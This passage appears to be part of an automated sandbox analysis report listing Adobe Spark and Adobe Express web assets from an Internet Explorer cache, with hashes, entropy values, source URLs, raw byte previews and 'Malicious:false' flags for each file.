                                                                                                                                                                                                                                                        Preview: <?xml version="1.0" encoding="utf-8"?>. Generator: Adobe Illustrator 22.0.0, SVG Export Plug-In . SVG Version: 6.00 Build 0) -->.<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px".. viewBox="0 0 67 67" style="enable-background:new 0 0 67 67;" width="67" height="67" xml:space="preserve">.<style type="text/css">...st0{fill:#717F8A;}.</style>.<title>icon-footer-twitter</title>.<g>..<path class="st0" d="M34.5,4.1c-16.6,0-30,13.4-30,30s13.4,30,30,30c16.6,0,30-13.4,30-30S51,4.1,34.5,4.1z M51,40.9...c0,1.4-0.3,2.8-0.8,4c-0.9,2.2-2.6,4-4.9,4.9c-1.3,0.5-2.7,0.7-4,0.8c-1.8,0.1-2.3,0.1-6.9,0.1c-4.5,0-5.1,0-6.9-0.1...c-1.4,0-2.8-0.3-4-0.8c-2.2-0.9-4-2.6-4.9-4.9c-0.5-1.3-0.7-2.7-0.8-4c-0.1-1.8-0.1-2.3-0.1-6.9c0-4.5,0-5.1,0.1-6.9...c0-1.4,0.3-2.8,0.8-4c0.9-2.2,2.6-4,4.9-4.9c1.3-0.5,2.7-0.7,4-0.8c1.8-0.1,2.3-0.1,6.9-0.1c4.5,0,5.1,0,6.9,0.1...c1.4,0,2.8,0.3,4,0.8c2.2,0.9,4,2.6,4.9,4.9c0.5,1.3,0.7,2.7,0.8,4c0.1,1.8,0.1,2.3,
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\left-arrow[1].png
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:PNG image data, 37 x 38, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):1058
                                                                                                                                                                                                                                                        Entropy (8bit):7.665700240485992
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:CtN+UcVYoWrqGJpH3xVd20s+Yeg3weZpjWQ6c7i43r:CtNWYBO0pH3xVK+Do776F4b
                                                                                                                                                                                                                                                        MD5:5CE00C645964CF02667D083A32CEC874
                                                                                                                                                                                                                                                        SHA1:A8D09FAD595AE7DF7A955030FAA21CCC561FC581
                                                                                                                                                                                                                                                        SHA-256:8BACF7F9552B5706A7E607F2FFAC2393884D09EDD921B22D8274FEAE33629822
                                                                                                                                                                                                                                                        SHA-512:6507ED4DE6F371594F22697D2C7729FA11DB0756E292E418196F1827EDEF12BB6E1E64C89BEE1C28739C5F255D7E2442741AB1A9B6E2925551B33F84744EB5D5
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://page.adobespark-assets.com/runtime/1.22/images/left-arrow.png
                                                                                                                                                                                                                                                        Preview: .PNG........IHDR...%...&.....C.R.....sBIT....|.d.....pHYs...........~.....tEXtCreation Time.05/02/13f.`.....tEXtSoftware.Adobe Fireworks CS6.....zIDATX..Ok.A...S.MI.5.*....H....D<...[......"..!.,..../..).....YE%1..M..a..m:...H+.....o...M...&#{.`..P.....:.RJ...u.(R.D.Rj.cmO....h.n........= P-.).h(..S>..0.....J...{...^..T>......VWW.i.u.\..............g.Q .d.L.\...f..T...7...}C...\ZZ.....^.j.......B).9?.@p....}A.......|...o.^Oc...q...........Rt.....L..h~~.n.....4p.......z.`[..h.P]@.@.8......#.)...........;*.|.S."L...p..M...b..T. .Z.-p...i .k..a..........A.<.....W8.G(.R...O.......a..T.....|j..K.J.r.rr.j@.(.......b.........|0>>>L dn+...z....m.911.R....^2.V.A.r1Y..|...z....z.P^B........qzz......!A}.dw.....zw...g....AsU?.....ZNv.Z...P(..p..m........7....3^[.f......_..BaY).m._2......Wz..-..=...0.p..,.t....}.>..d............J).b.&.q...x+..w..T*....~.l...<..*.Z.HGfgg.D......d2.:.o..o.p/........~.>...<[[[{..l6.K{.[...B..h...Ly3^*.n`B.....Q.|C.....m.R.h.u...
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\lightbox_close@2x[1].png
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:PNG image data, 40 x 40, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):1453
                                                                                                                                                                                                                                                        Entropy (8bit):6.759166148396455
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:B1hnBWwh82lYSKw5hVa64XVKT3JryJ3Vo5hVa6fGjwKZRfp2XOBY6:v1kvnLI600J3e7cVh2XOb
                                                                                                                                                                                                                                                        MD5:13198D9E24E4047B757E69F32897B19D
                                                                                                                                                                                                                                                        SHA1:868CEB3BDC559535E5E638A9E145F35005AF33C6
                                                                                                                                                                                                                                                        SHA-256:2603DCB84908061D1A9E31DA6080328BF7867BFC4AA7A1A9A0FBD25E5942A043
                                                                                                                                                                                                                                                        SHA-512:86D943EFB966752531E91911D5F1A9B27CD5003D2E96F19CAE833F88DF856A59C099B237E5EEDC840E00CFF6B9F34E6583B2F2F676EFAEC5055E5030198E5810
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://page.adobespark-assets.com/runtime/1.22/images/lightbox_close@2x.png
                                                                                                                                                                                                                                                        Preview: .PNG........IHDR...(...(........m....tEXtSoftware.Adobe ImageReadyq.e<...xiTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c021 79.155772, 2014/01/13-19:44:00 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:0e41a95d-3ffa-4ff2-9f01-79e98faa126a" xmpMM:DocumentID="xmp.did:A061BB706D2311E4A705EAFA721C606B" xmpMM:InstanceID="xmp.iid:A061BB6F6D2311E4A705EAFA721C606B" xmp:CreatorTool="Adobe Photoshop CC 2014 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:caa2ca59-503f-4ad4-961c-e872383c57cd" stRef:documentID="xmp.did:0e41a95d-3ffa-4ff2-9f01-79e98faa126a"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>F.M.....IDATx...1J.@......DR(.iia
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\location[1].js
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):182
                                                                                                                                                                                                                                                        Entropy (8bit):4.685293041881485
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3:LUfGC48HlHJ2R4OE9HQnpK9fQ8I5CMnRMRU8x4RiiP22/90+apWyRHfHO:nCf4R5ElWpKWjvRMmhLP2saVO
                                                                                                                                                                                                                                                        MD5:C4F67A4EFC37372559CD375AA74454A3
                                                                                                                                                                                                                                                        SHA1:2B7303240D7CBEF2B7B9F3D22D306CC04CBFBE56
                                                                                                                                                                                                                                                        SHA-256:C72856B40493B0C4A9FC25F80A10DFBF268B23B30A07D18AF4783017F54165DE
                                                                                                                                                                                                                                                        SHA-512:1EE4D2C1ED8044128DCDCDB97DC8680886AD0EC06C856F2449B67A6B0B9D7DE0A5EA2BBA54EB405AB129DD0247E605B68DC11CEB6A074E6CF088A73948AF2481
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location
                                                                                                                                                                                                                                                        Preview: jsonFeed({"country":"CH","state":"ZH","stateName":"Zurich","zipcode":"8152","timezone":"Europe/Zurich","latitude":"47.43000","longitude":"8.57180","city":"Zurich","continent":"EU"});
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\login[1].htm
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:HTML document, ASCII text, with very long lines
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):39223
                                                                                                                                                                                                                                                        Entropy (8bit):5.39365543581477
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:768:2l1lHt/JNVFGJIeNI9ReC0bG5woJhEZCvjgDMiB+2ahy2DdLSpcFFaI:cFe0erbGYZCvjkM2ahy2DVpFaI
                                                                                                                                                                                                                                                        MD5:8D49F21A7A99CDCBCDDB2AC82D15B8A8
                                                                                                                                                                                                                                                        SHA1:11DB305B81207BCD83D95C2D3531FF004BE37457
                                                                                                                                                                                                                                                        SHA-256:4C7160D9597E89DBCC9050843F7C9B77F8D9210C27319CD258B62411BB2256ED
                                                                                                                                                                                                                                                        SHA-512:259A4B74598A3897A7BAA82C7B5AF81F7DCFFAB619BF906AB51B339BC87157DDC4AA4CA3AE4005DEBA65A6AD43F779AD99D3D1A08BAC79AB60C26DF8B24F086B
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://spark.adobe.com/sp/login?r=reader_page_topbar_createyourown
                                                                                                                                                                                                                                                        Preview: <!DOCTYPE html>.<html lang="en-US">.<head>. <script nomodule>document.location.href = '/unsupported';</script>. <title>Make Images, Videos and Web Stories for Free in Minutes | Adobe Spark</title>. <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />. <meta name="viewport" content="width=device-width,shrink-to-fit=no,user-scalable=no,initial-scale = 1.0,maximum-scale = 1.0">.<script type="text/javascript">.;window.NREUM||(NREUM={});NREUM.init={privacy:{cookies_enabled:true}};.window.NREUM||(NREUM={}),__nr_require=function(t,e,n){function r(n){if(!e[n]){var i=e[n]={exports:{}};t[n][0].call(i.exports,function(e){var i=t[n][1][e];return r(i||e)},i,i.exports)}return e[n].exports}if("function"==typeof __nr_require)return __nr_require;for(var i=0;i<n.length;i++)r(n[i]);return r}({1:[function(t,e,n){function r(t){try{c.console&&console.log(t)}catch(e){}}var i,o=t("ee"),a=t(22),c={};try{i=localStorage.getItem("__nr_flags").split(","),console&&"function"==typeof con
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\logo[1].htm
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:HTML document, UTF-8 Unicode text, with very long lines
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):11995
                                                                                                                                                                                                                                                        Entropy (8bit):5.293849349073135
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:Gdkm3kniypiyyKk8iyqgrdnX/XvrsSXi3TXDrX+QJXyXgqXUXiLX4TXpXqX9XaXL:GWmUiDX15F8vjsvTzruciQqkwUZaNKfj
                                                                                                                                                                                                                                                        MD5:B940B432EFF3FA19804063B41F655D89
                                                                                                                                                                                                                                                        SHA1:62128D1FF78DF5B506FE7E1EC64B5884B35EA6C8
                                                                                                                                                                                                                                                        SHA-256:9869B83FC9DCA1DFB8D3E7E4744C2984EDC273B8754ED798DCEFA889E1998900
                                                                                                                                                                                                                                                        SHA-512:75FF24907942ABC425FC8602DC7353E709DA57F7FB489BE2C331333D0F81D0822CDFEDB0DB021915E0B4E8E1E023B92A5C629B96F893B8D757B8DF4BF5CA040E
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/express/create/logo?r=reader_page_learnmore
                                                                                                                                                                                                                                                        Preview: <!DOCTYPE html><html><head><title>Free Logo Maker: Design Custom Logos | Adobe Spark</title><link rel="canonical" href="https://www.adobe.com/express/create/logo"><meta name="x-source-hash" content="FK3p/Iehi0Pwt+8C"><meta name="description" content="Build a custom logo for your brand, business, event, or even just for yourself. No design experience is necessary to create a logo that perfectly captures your idea."><meta property="og:title" content="Free Logo Maker: Design Custom Logos | Adobe Spark"><meta property="og:description" content="Build a custom logo for your brand, business, event, or even just for yourself. No design experience is necessary to create a logo that perfectly captures your idea."><meta property="og:url" content="https://www.adobe.com/express/create/logo"><meta property="og:image" content="https://www.adobe.com/express/create/media_14abffd21a7d6097f1e2ae3f31e97c67849e1d60a.png?width=1200&amp;format=pjpg&amp;optimize=medium"><meta property="og:image:secure_url" co
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\m-web-77674361[1].js
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):202681
                                                                                                                                                                                                                                                        Entropy (8bit):5.412330083423665
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3072:yQcps0q4cs4qo5+3t7mjmkBrW+BG4lRkk+LSJw:esB4cb50UjzpBzkk+N
                                                                                                                                                                                                                                                        MD5:955B1F89E50EADB1F60A07A7AADDDE20
                                                                                                                                                                                                                                                        SHA1:3BF38310C308B022F5720AEE9903ED2C52299CCC
                                                                                                                                                                                                                                                        SHA-256:64F06C5136B1C8B451D30A95C680811220EA7F3F0B825309CEE7F08E249214D4
                                                                                                                                                                                                                                                        SHA-512:B34AA4A68EB90C816A5A9A1926E4C8A35839745BC1C2BF0F0EB78819FF1E9B464533B63F622C1A142E73ED182C6FF41DE31973E8FC45390DEFAEE26DC2DEE541
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://spark.adobe.com/static/m-web-77674361.js
                                                                                                                                                                                                                                                        Preview: !function(e){function t(t){for(var n,r,i=t[0],a=t[1],s=0,c=[];s<i.length;s++)r=i[s],Object.prototype.hasOwnProperty.call(o,r)&&o[r]&&c.push(o[r][0]),o[r]=0;for(n in a)Object.prototype.hasOwnProperty.call(a,n)&&(e[n]=a[n]);for(u&&u(t);c.length;)c.shift()()}var n={},r={"m-web":0},o={"m-web":0};function i(t){if(n[t])return n[t].exports;var r=n[t]={i:t,l:!1,exports:{}};return e[t].call(r.exports,r,r.exports,i),r.l=!0,r.exports}i.e=function(e){var t=[];r[e]?t.push(r[e]):0!==r[e]&&{"m-react-spectrum":1}[e]&&t.push(r[e]=new Promise((function(t,n){for(var o=e+"-"+{0:"aea76d9f",1:"984c4a47",2:"032b5658",3:"1650f77c",4:"770290d3",5:"ba694c08",6:"6396ad7a",8:"d2b041a7",10:"8af88370",11:"0da53278",12:"9c1039e6",13:"721c2c60",14:"ba83169a",15:"4d7ce2ef",16:"be563a68",17:"66cddab5",18:"828b1b85",19:"17aecb24",21:"9e09a5a6",LoggedOutBumperTestingTools:"d57f461c","m-react-spectrum":"70918daa","vendors~auth-not-required-app~brand-kit-context-views~brand-kit-editor~brandswitcher~logged-in-app~n~567f5255
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\marvelcommon-51100480[1].js
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:UTF-8 Unicode text, with very long lines
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):204314
                                                                                                                                                                                                                                                        Entropy (8bit):5.2927791837848055
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3072:PVrtOowrXBOn3nmm6qI8pzYfwbgUU60R6X+ltN6HBDM:NrgowXMnXT6appgUU608Y4M
                                                                                                                                                                                                                                                        MD5:48F849DA6F644B576196923A27236F15
                                                                                                                                                                                                                                                        SHA1:8D47A27FA948519768268ECA970AB6487771A287
                                                                                                                                                                                                                                                        SHA-256:15DA34D198A8ADE100CC1A6047F99FC87FC7785754E8E1A39A49F06F5D5D5873
                                                                                                                                                                                                                                                        SHA-512:76340CBD3DCD0D2D534679319153F10833768B4C5F713871E782D4D854746AF1E4A880224BAD3C2BDB9626F5B615DEED67B3B176D38F97EC222309E9FDFF3637
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://spark.adobe.com/static/marvelcommon-51100480.js
                                                                                                                                                                                                                                                        Preview: var marvelcommon=function(t){var e={};function n(r){if(e[r])return e[r].exports;var i=e[r]={i:r,l:!1,exports:{}};return t[r].call(i.exports,i,i.exports,n),i.l=!0,i.exports}return n.m=t,n.c=e,n.d=function(t,e,r){n.o(t,e)||Object.defineProperty(t,e,{enumerable:!0,get:r})},n.r=function(t){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(t,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(t,"__esModule",{value:!0})},n.t=function(t,e){if(1&e&&(t=n(t)),8&e)return t;if(4&e&&"object"==typeof t&&t&&t.__esModule)return t;var r=Object.create(null);if(n.r(r),Object.defineProperty(r,"default",{enumerable:!0,value:t}),2&e&&"string"!=typeof t)for(var i in t)n.d(r,i,function(e){return t[e]}.bind(null,i));return r},n.n=function(t){var e=t&&t.__esModule?function(){return t.default}:function(){return t};return n.d(e,"a",e),e},n.o=function(t,e){return Object.prototype.hasOwnProperty.call(t,e)},n.p="",n(n.s=3)}([function(t,e){./*! jQuery v2.1.3 | (c) 2005, 2014 jQuery Foundati
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\media_10c5b0e0381728162d8b366adc11d637c97374b24[1].png
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:[none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):13412
                                                                                                                                                                                                                                                        Entropy (8bit):7.982754853803549
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:ZvdxfjOOdJxaursPO4g0/80EZa5Y/1exG2TRzsTImk0vLr0JCH7Wc06QaIz:ZlxfiOdJ03Po0/bYtek2xsA0D+Cyc0O8
                                                                                                                                                                                                                                                        MD5:58272D541D2634C527BAF44C9F639384
                                                                                                                                                                                                                                                        SHA1:C5C6CBC93A569FD62943FD680D35631C3D19E134
                                                                                                                                                                                                                                                        SHA-256:443F535868FB697A86587EA63A345546005EADBB7BEFF67DE38DAF68C4CCEF6D
                                                                                                                                                                                                                                                        SHA-512:EF44664687777DABFFC6A480C2A6FE3FE013FFAB113B4188192EC1701A0776000561F5EAEC74E9079C289C2773B846E20C849AADF4823DB07B76885235D3C90B
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/express/discover/templates/media_10c5b0e0381728162d8b366adc11d637c97374b24.png?width=2000&format=webply&optimize=medium
                                                                                                                                                                                                                                                        Preview: RIFF\4..WEBPVP8 P4..P....*....>u8.H$..!%.Z....gn.6..D2..yo.X..!..............g.......T.@.;.X.../_P........w.r....?q......vG...3..?..o.c......y../._....v...[.w...{.'..@/`......._...}C.?._.O.....?..........^D_W...G........?......b...../8..............N....~.~............S[C..4.W.m...W..q.[D@s.F.:g~i.3......u!z..u.....2(x=..cP........}m.lK'.+.....h.{.g.)Qe0.?.......%..v...)C.......Y?h...r..u...A.'.`}...q....v[..B...&`.B:..VL..}J5....D.!..A....u...f..e..^I....."zm..~T.p..#.gA.Y.lGJ....7u...B....qMC7.dk.n~..u...X...a.O....7........,.i.....LYR...[...Zb$Q{...?`....]....&..F$.h7c....?A..H......]?p.}r.~..p..c..)....6ZdN.x*..~..VSP(.......B.e.).........W.,...A::G..I.....!.q..&>Xc..w.)>.....8...MUQx.N....VW..)*C..v.x..,..7!w..|sK.l...Sz.C......z...../.A|....D..p.6.Q/.q....)Pa.K...,.M...+7..z..4.CP..?.X....p...O....`.G...8Q..L4.....r.D..x.L..vv.+Q_..+/o......m.!F.v.9...w#PH,..n.k7.....#O.q..S.Y..:.m..~.X.._"....,...bv....Ch...'.....&.%9..W....aP..../...UY=...
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\media_11aafb163b677440f9ec0629d83285ca4b9242a86[1].png
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:[none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):15318
                                                                                                                                                                                                                                                        Entropy (8bit):7.986200007515578
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:384:eRXNtfs9/nKcNn0SZ4GmI50sgm+grp7c6xfFO3OwWKXyMexZaJ:entk8SZ4pbWrdD+OwWKP
                                                                                                                                                                                                                                                        MD5:17A059617671AD5F58BF8061CEF18003
                                                                                                                                                                                                                                                        SHA1:9B66601377276C135D0AA425DA3EA66E1D6F1FBC
                                                                                                                                                                                                                                                        SHA-256:37D5266D1C2E2CF4632A7505B552B42C35E72CD70BBB54051FE95F269BEF4A28
                                                                                                                                                                                                                                                        SHA-512:C13E5A85F4A70CDE1438F122A62308088D55EB2301274AE0E3B52FCDC73026D04C7CD2A53766195BE230F9505046EFFF0FC557C55339C30B89D8B2AF29B61B7E
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/express/discover/templates/media_11aafb163b677440f9ec0629d83285ca4b9242a86.png?width=2000&format=webply&optimize=medium
                                                                                                                                                                                                                                                        Preview: RIFF.;..WEBPVP8 .;..P....*..k.>u2.G...!(R.....cn.kTQ.-'.........~..i_W.L...........;.C....=7....}P?k.j.g?.t..........^.<F...._M..{7..<.z..O...?.~..w.....x..#...^....:.k..Gr.M.....?......i...}..G......._`?.........../........#.3...w.........}7.w.....?........y......m....u....~...7.Z..I._.O..S.e.&[(....H._G9..........~.c.)i.r0:...6.V.e.{.1.0....S6...>.xB.....{..9j.(.p!..e.5.P:tT&.....l.t.G:7cH.R4.z...,......o.+^.............WPa..J.u.{.d...Q...m... ........U..4.W.*.......91^O. .......A}..ASA....t.!.o.y.....A..]j..#-?M...|.x$Ci...........#.._.2j....+..tz.?\.6....8fYq...n.{..:......W.sp|oC.;.v1...?{|.-.:>......Of.b..D...F.....}.m/;.i.&Ou....KF).p.p9..V....}....x.D>..k..Z!j."..+.n.P. ,..+.>.....^_....\d...8Z...8.J.5..q..#..a%.....i....:I.q%...q.1....2.;l:.$g..../(.\.$F%.J.....<O...x..].t....,ER...o.6b.._....!..P4./.\_...zk.{..??\..fTW8.........T..a.^RE...a%x.@<.&..`....0>....A.[..b...D.....w_mV.n....J..\.@....D.%.yV.[..3..j..AN....U\.@b...
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\media_1235336d551d49197b9e2b3a6bb68d4323f0b71d8[1].png
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:[none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):10200
                                                                                                                                                                                                                                                        Entropy (8bit):7.983376089678874
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:ZEeHwQKZyKZh/Vou5ypBWON4i9u0xmkCuJBCltLsjGyVy178n/Nq6gwd:ZEeQ1oWKu5y40QuioSVk/Nq6b
                                                                                                                                                                                                                                                        MD5:C286185F0A4BC20981D73522ADEE257D
                                                                                                                                                                                                                                                        SHA1:64581F265B1BC39AF91387D88E3798D2C0BBBBA1
                                                                                                                                                                                                                                                        SHA-256:40EA94D7E470E52164F498AE03DD415D1B0145499DFBC6EF806752F873A89CCD
                                                                                                                                                                                                                                                        SHA-512:356D87C5D909EA86D0DF60AFB477363A81EBBF70AF403AFF9EBCB1126ED1A5FD8C1072AFF4B55981CB2F31FDFE82459525FEAD68A2E3FFB24B3D4BF3BDB0D97F
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/express/discover/templates/media_1235336d551d49197b9e2b3a6bb68d4323f0b71d8.png?width=2000&format=webply&optimize=medium
                                                                                                                                                                                                                                                        Preview: RIFF.'..WEBPVP8 .'.......*..k.>u6.H$..!$S{...en.|.q..A._./a._y4sO./Q...5zH...%.;.-..../Q...KG.....:.^a.%.'...s........]......)?............3...K.{.uO.>...}s.?..Q.v.3...........~.................../....p?.?....9~...0.od..{..l..M..|.h9H..1.v... S.Rc.....i....../2.I0...-.....Kh..d.{......{v..N.;.)..q`8.0....G.+.^/...R.......J.lt>y.^}&..UH....;.~..zn.."bu.l...Je.g.(...D....|...\..v..F.,...`.X.9._,./@>.x..p.....f.?.1[<...f...yo..I.%).......q.(+.k/..0..">e95..1X}.l........)......8...1.".F....k8.q.....D..!........x)CPE.+.....M.LW.-.U...w..j2..fH. .97L.".q~..0....S&n...o4...}.{....I...0...i.o...N*Y.....k.=..S.A=A.3.!.h...h..]p.Rm......R'..[.F.....kz.x.K..d.Q.W....o.....q...^.NAD.'.....!c^%....7.o..3...,8..h.......N0.8p.....C.,....b..c.h6+...W.{..&.L..2"8..Oz..'`..j..$...'W..#.9..........s......h*......I.,.oah.YW_.U....4R..R'..oY.&..x....~.lVS.`..>..S. N:+'.dM!Ce.O.AQ......[i5...|h(|..|...>.S.T...v...DO9.i.%&d.IL....^..L...6.m...A/......9.
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\media_12438f0ed5e015acd4f31b04e2a0bfd095e616ecd[1].jpeg
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:[none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):11994
                                                                                                                                                                                                                                                        Entropy (8bit):7.944011736504239
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:SI8xno2dayzZxtFj7tRY8Cr9HEz8F+8nEJ2H3lrcTxJzIr75fSEXe9mN:8xoMZxDXtC8C9kz8FxnX3lr1Bu0
                                                                                                                                                                                                                                                        MD5:7A9C201C09A4DFD3344ED1A558BC9838
                                                                                                                                                                                                                                                        SHA1:EFA2D3D98EE80B2B89A2FC87CD5364BC2934C7DD
                                                                                                                                                                                                                                                        SHA-256:03EACA689BDB3B97F0C64ECA889CC949E5E35FBE229759E77C61EEC59ECD0002
                                                                                                                                                                                                                                                        SHA-512:9063413B8E0370EF8C3E857BE4BFAF3629A99167E10CC6C0FAE454CFDCB0C516A15AD3E9949CB9BBE62FD650828ABE44DE32E8CDD657E3804DC505F832BE901C
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/express/create/media_12438f0ed5e015acd4f31b04e2a0bfd095e616ecd.jpeg?width=2000&format=webply&optimize=medium
                                                                                                                                                                                                                                                        Preview: RIFF....WEBPVP8 ....p....*8.8.>u:.J$."...H....in._..h.../E..N6.>...I...S..k..?../...{..?......e...^.?../.F....[.2.2.....|.~...?.{....4z.............7.........{}.B....IK.............IK.............IK.............IK.............IK.............IK.............IK.............IK.............JW/..y.[.A....n.)%/.n.f.B.R....n.)..[.>......S...C..@....x#pn..x/......IK.............)w.w...O.^)VMq...nKe..m...3.cn.)%/.n.f.B.R....n...1.d[...,^.U..mP)}..u7..BW......3....]2.b*.....n.f.B.R....n.)%/.i.}.....(^ip.iK.sK.Ag^..1. UL.S...!.e.jM.....D..cy.l...^..$..m...HRJ_.d....(....,.J.)..H...G.x]..g..=..|n..A..&.u.n.)%/.n.f.B.R.....;.....iL-.r..z. ..!I)s!.....JC.-a~.h..vP.?C...!I).[u{7R.....W.s.=L..~*.C....*....^..|..a..".ZP..`A.k.Q...n.)%/.n.f.B..SH.4.CX.]y...u!I).[u7xVv..7-{.wy..!....n.)%/.n.f.>...x..E~1L.Nk...m...HQN=7..._.(MZ..%a.>...IK.........F....'a..|...........8FM...n[u{7R.....W.u!E`.Q@>..vvJ..."..O..n..xi..W...(^f........qY..}%/.n.f.B.R....l.,%,Y.g.].
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\media_127d8ddf746b3d9b821b50287212a23ace9adf57c[1].jpeg
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:[none]x[none], YUV color, decoders should clamp
